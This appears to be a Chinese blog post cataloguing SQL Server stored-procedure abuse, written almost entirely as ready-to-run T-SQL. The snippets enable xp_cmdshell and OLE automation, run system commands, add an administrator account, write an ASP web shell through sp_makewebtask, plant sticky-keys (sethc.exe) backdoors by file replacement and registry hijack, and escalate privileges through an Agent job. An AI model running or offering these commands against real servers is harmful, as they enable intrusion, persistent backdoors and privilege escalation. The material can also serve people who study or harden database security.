SQL 不常用的一些命令sp_OACreate，xp_cmdshell，sp_makewebtask

最新推荐文章于 2024-03-01 16:14:29 发布

Adminxe

最新推荐文章于 2024-03-01 16:14:29 发布

阅读量772

点赞数 1

文章标签：安全漏洞 sqlserver mysql

本文链接：https://blog.youkuaiyun.com/Adminxe/article/details/105908045

版权

本文详细介绍了SQL Server中高危存储过程的使用方法，包括开启和关闭xp_cmdshell、sp_oacreate、sp_makewebtask及openrowset等，展示了如何通过这些过程执行系统命令、文件操作及远程数据访问，对于理解SQL Server的安全性和功能至关重要。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1.
开启和关毕xp_cmdshell
EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;– 开启xp_cmdshell
EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 0;RECONFIGURE;– 关毕xp_cmdshell
EXEC sp_configure ‘show advanced options’, 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options

2.
xp_cmdshell执行命令
EXEC master..xp_cmdshell ‘ipconfig’

3.
开启和关毕sp_oacreate
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ole Automation Procedures’,1;RECONFIGURE; 开启
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ole Automation Procedures’,0;RECONFIGURE; 关毕
EXEC sp_configure ‘show advanced options’, 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options

4.
sp_OACreate删除文件
DECLARE @Result int
DECLARE @FSO_Token int
EXEC @Result = sp_OACreate ‘Scripting.FileSystemObject’, @FSO_Token OUTPUT
EXEC @Result = sp_OAMethod @FSO_Token, ‘DeleteFile’, NULL, ‘C:\Documents and Settings\All Users\「开始」菜单\程序\启动\user.bat’
EXEC @Result = sp_OADestroy @FSO_Token

5.
sp_OACreate复制文件
declare @o int
exec sp_oacreate ‘scripting.filesystemobject’, @o out
exec sp_oamethod @o, ‘copyfile’,null,’c:\windows\explorer.exe’ ,’c:\windows\system32\sethc.exe’;

6.
sp_OACreate移动文件
declare @aa int
exec sp_oacreate ‘scripting.filesystemobject’, @aa out
exec sp_oamethod @aa, ‘moveFile’,null,’c:\temp\ipmi.log’, ‘c:\temp\ipmi1.log’;

7.
sp_OACreate加管理员用户

DECLARE @js int
EXEC sp_OACreate ‘ScriptControl’,@js OUT
EXEC sp_OASetProperty @js, ‘Language’, ‘JavaScript’
EXEC sp_OAMethod @js, ‘Eval’, NULL, ‘var o=new ActiveXObject(“Shell.Users”);z=o.create(“user”);z.changePassword(“pass”,””);z.setting(“AccountType”)=3;’

8.
开启和关毕sp_makewebtask
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Web Assistant Procedures’,1;RECONFIGURE; 开启
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Web Assistant Procedures’,0;RECONFIGURE; 关毕
EXEC sp_configure ‘show advanced options’, 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options

9.
sp_makewebtask新建文件
exec sp_makewebtask ‘c:\windows.txt’,’ select ”<%25execute(request(“a”))%25>” ‘;;–

10.
wscript.shell执行命令
use master
declare @o int
exec sp_oacreate ‘wscript.shell’,@o out
exec sp_oamethod @o,’run’,null,’cmd /c “net user” > c:\test.tmp’

11.
Shell.Application执行命令
declare @o int
exec sp_oacreate ‘Shell.Application’, @o out
exec sp_oamethod @o, ‘ShellExecute’,null, ‘cmd.exe’,’cmd /c net user >c:\test.txt’,’c:\windows\system32′,”,’1′;
or
exec sp_oamethod @o, ‘ShellExecute’,null, ‘user.vbs’,”,’c:\’,”,’1′;

12.
开启和关毕openrowset
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ad Hoc Distributed Queries’,1;RECONFIGURE; 开启
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ad Hoc Distributed Queries’,0;RECONFIGURE; 关毕
EXEC sp_configure ‘show advanced options’, 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options

13.
沙盒执行命令
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1 默认为3
select * from openrowset(‘microsoft.jet.oledb.4.0′,’;database=c:\windows\system32\ias\ias.mdb’,’select shell(“cmd.exe /c echo a>c:\b.txt”)’)

14.
注册表劫持粘贴键
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution
Options\sethc.EXE’,’Debugger’,’REG_SZ’,’C:\WINDOWS\explorer.exe’;

15.
sp_oacreate替换粘贴键
declare @o int
exec sp_oacreate ‘scripting.filesystemobject’, @o out
exec sp_oamethod @o, ‘copyfile’,null,’c:\windows\explorer.exe’ ,’c:\windows\system32\sethc.exe’;
declare @oo int
exec sp_oacreate ‘scripting.filesystemobject’, @oo out exec sp_oamethod @oo, ‘copyfile’,null,’c:\windows\system32\sethc.exe’ ,’c:\windows\system32\dllcache\sethc.exe’;

16.
public权限提权操作
USE msdb
EXEC sp_add_job @job_name = ‘GetSystemOnSQL’, www.xxx.com
@enabled = 1,
@description = ‘This will give a low privileged user access to
xp_cmdshell’,
@delete_level = 1

EXEC sp_add_jobstep @job_name = ‘GetSystemOnSQL’,
@step_name = ‘Exec my sql’,
@subsystem = ‘TSQL’,
@command = ‘exec master..xp_execresultset N”select ””exec
master..xp_cmdshell “dir > c:\agent-job-results.txt””””,N”Master”’
EXEC sp_add_jobserver @job_name = ‘GetSystemOnSQL’,
@server_name = ‘SERVER_NAME’
EXEC sp_start_job @job_name = ‘GetSystemOnSQL’